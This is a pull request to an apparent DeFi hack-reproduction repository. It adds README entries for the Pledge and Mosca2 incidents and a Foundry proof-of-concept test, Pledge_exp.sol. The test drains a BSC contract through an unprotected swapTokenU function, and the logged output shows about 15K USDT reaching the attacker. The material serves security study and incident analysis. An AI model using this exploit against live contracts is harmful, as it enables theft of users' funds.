### PR TITLE
feat: add Pledge attack incident

### DIFF
--- a/README.md
+++ b/README.md
@@ -3,7 +3,7 @@
 **Reproduce DeFi hack incidents using Foundry.**
 
 
-550 incidents included.
+552 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -65,6 +65,8 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 [20250104 98#Token](#20250104-98Token---Unprotected-public-function)
 
 [20250101 LAURAToken](#20250101-lauratoken---pair-balance-manipulation)
+
+[20241203 Pledge](#20241203-pledge---access-control)
 
 [20241119 PolterFinance](#20241119-polterfinance---flashloan-attack)
 
@@ -1308,6 +1310,26 @@ forge test --contracts ./src/test/2025-01/LAURAToken_exp.sol -vvv
 https://x.com/TenArmorAlert/status/1874455664187023752
 
 ---
+
+
+
+
+### 20241203 Pledge - Access Control
+
+### Lost: 15K
+
+
+```sh
+forge test --contracts ./src/test/2024-12/Pledge_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[Pledge_exp.sol](src/test/2024-12/Pledge_exp.sol)
+### Link reference
+
+https://x.com/TenArmorAlert/status/1864126176848965810
+
+---
+
 
 ### 20241119 PolterFinance - FlashLoan Attack
 

--- a/README.md
+++ b/README.md
@@ -2,7 +2,6 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-
 552 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
@@ -49,6 +48,8 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+
+[20250113 Mosca2](#20250113-mosca2---logic-flaw)
 
 [20250111 RoulettePotV2](#20250111-roulettepotv2---price-manipulation)
 
@@ -1190,6 +1191,22 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 
 ### List of DeFi Hacks & POCs
 
+### 20250113 Mosca2 - Logic Flaw
+
+### Lost: 37.6K
+
+
+```sh
+forge test --contracts ./src/test/2025-01/Mosca2_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[Mosca2_exp.sol](src/test/2025-01/Mosca2_exp.sol)
+### Link reference
+
+https://x.com/TenArmorAlert/status/1878699517450883407
+
+---
+
 ### 20250111 RoulettePotV2 - Price Manipulation
 
 ### Lost: ~28K
@@ -1311,9 +1328,6 @@ https://x.com/TenArmorAlert/status/1874455664187023752
 
 ---
 
-
-
-
 ### 20241203 Pledge - Access Control
 
 ### Lost: 15K
@@ -1329,7 +1343,6 @@ forge test --contracts ./src/test/2024-12/Pledge_exp.sol -vvv --evm-version shan
 https://x.com/TenArmorAlert/status/1864126176848965810
 
 ---
-
 
 ### 20241119 PolterFinance - FlashLoan Attack
 

--- a/src/test/2024-12/Pledge_exp.sol
+++ b/src/test/2024-12/Pledge_exp.sol
@@ -1,0 +1,44 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+
+// @KeyInfo - Total Lost : 15K
+// Attacker : https://bscscan.com/address/0x59367b057055fd5d38ab9c5f0927f45dc2637390
+// Attack Contract : https://bscscan.com/address/0x4aa0548019bfecd343179d054b1c7fa63e1e0b6c
+// Vulnerable Contract : https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1
+// Attack Tx : https://bscscan.com/tx/0x63ac9bc4e53dbcfaac3a65cb90917531cfdb1c79c0a334dda3f06e42373ff3a0
+
+// @Info
+// Vulnerable Contract Code : https://bscscan.com/address/0x061944c0f3c2d7dabafb50813efb05c4e0c952e1#code
+
+// @Analysis
+// Post-mortem : 
+// Twitter Guy : 
+// Hacking God : 
+pragma solidity ^0.8.0;
+
+import "../interface.sol";
+
+interface IPledge {
+    function swapTokenU(uint256 amount, address _target) external;
+}
+
+contract Pledge is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 44_555_337;
+    address internal constant pledge =  0x061944c0f3c2d7DABafB50813Efb05c4e0c952e1;
+    address internal constant MFT = 0x4E5A19335017D69C986065B21e9dfE7965f84413;
+    address internal constant BUSD = 0x55d398326f99059fF775485246999027B3197955;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", blocknumToForkFrom);
+        deal(BUSD, address(this), 0);
+        fundingToken = address(BUSD);
+    }
+
+    function testExploit() public balanceLog {
+        uint256 amount = IERC20(MFT).balanceOf(pledge);
+        address _target = address(this);
+        IPledge(pledge).swapTokenU(amount, _target);
+    }
+}


### PR DESCRIPTION
Please review the Mosca attack incident first, it will keep the correct incident number.

```bash
Ran 1 test for src/test/2024-12/Pledge_exp.sol:Pledge
[PASS] testExploit() (gas: 205339)
Logs:
  Attacker USDT Balance Before exploit: 0.000000000000000000
  Attacker USDT Balance After exploit: 14994.304057738361451515

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.96s (946.21µs CPU time)

Ran 2 test suites in 1.97s (3.32s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
```